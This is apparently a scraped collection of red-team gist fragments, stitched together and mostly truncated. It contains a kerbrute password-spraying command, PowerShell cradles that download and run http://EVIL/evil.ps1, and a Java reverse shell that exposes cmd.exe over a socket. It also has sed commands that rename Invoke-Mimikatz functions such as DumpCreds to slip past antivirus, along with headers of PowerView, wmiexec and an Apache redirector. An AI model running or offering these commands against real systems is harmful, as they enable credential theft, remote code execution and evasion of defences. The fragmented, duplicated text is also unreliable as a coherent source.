With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
String host="localhost"; | |
int port=8044; | |
String cmd="cmd.exe"; | |
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); |
#DISCLAIMER | |
#I'm not the original author of the script... | |
#Original git repo vanished | |
function String-to-ByteArray ($String) | |
{ | |
$ByteArray=@() | |
For ( $i = 0; $i -lt ($String.Length/2); $i++ ) | |
{ | |
$Chars=$String.Substring($i*2,2) |
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
# New function naming schema: | |
# Verbs: | |
# Get : retrieve full raw data sets | |
# Find : ‘find’ specific data entries in a data set |
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
# Uncomment below two lines to clean comments from all .ps1 files in ./ | |
#find ./ -name "*.ps1" -exec sed -i -e '/^<#/,/^#>/d' {} \; | |
#find ./ -name "*.ps1" -exec sed -i -e 's/#.*$//' {} \; | |
sed -i -e '/^<#/,/^#>/d' Invoke-Mimikatz.ps1 | |
sed -i -e 's/#.*$//' Invoke-Mimikatz.ps1 | |
sed -i -e's/DumpCerts/GimmeCerts/g' Invoke-Mimikatz.ps1 | |
sed -i -e 's/DumpCreds/GimmeCreds/g' Invoke-Mimikatz.ps1 |
# twitterfavlinks.py - Throw back all your favorites that contain a url. Get any applicable redirects. Note there are Twitter API | |
# limits, so if you have a gazillion favorites, you probably won't get them all. YMMV | |
# | |
# Author: @curi0usJack | |
# | |
# Dependencies: | |
# Tweepy: sudo pip install tweepy | |
# Twitter API access. Set up here: https://apps.twitter.com/ | |
import tweepy |
# | |
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__! | |
# | |
# Note this version requires Apache 2.4+ | |
# | |
# Save this file into something like /etc/apache2/redirect.rules. | |
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom | |
# | |
# Include /etc/apache2/redirect.rules | |
# |
#!/bin/bash | |
# Nmap can crash when scanning large ranges | |
# To use this script, start your scan with whatever | |
# nmap options you want making sure you use -oA <filename> | |
# or -oG <filename> (you need the gnmap file) then cancel | |
# the scan. replace <filename> below and run this script. | |
# It will also record when it failed to a file called failed.txt | |
until nmap --resume <filename>.gnmap |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#!/usr/bin/env python | |
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. | |
# | |
# This software is provided under under a slightly modified version | |
# of the Apache Software License. See the accompanying LICENSE file | |
# for more information. | |
# | |
# A similar approach to smbexec but executing commands through WMI. | |
# Main advantage here is it runs under the user (has to be Admin) | |
# account, not SYSTEM, plus, it doesn't generate noisy messages |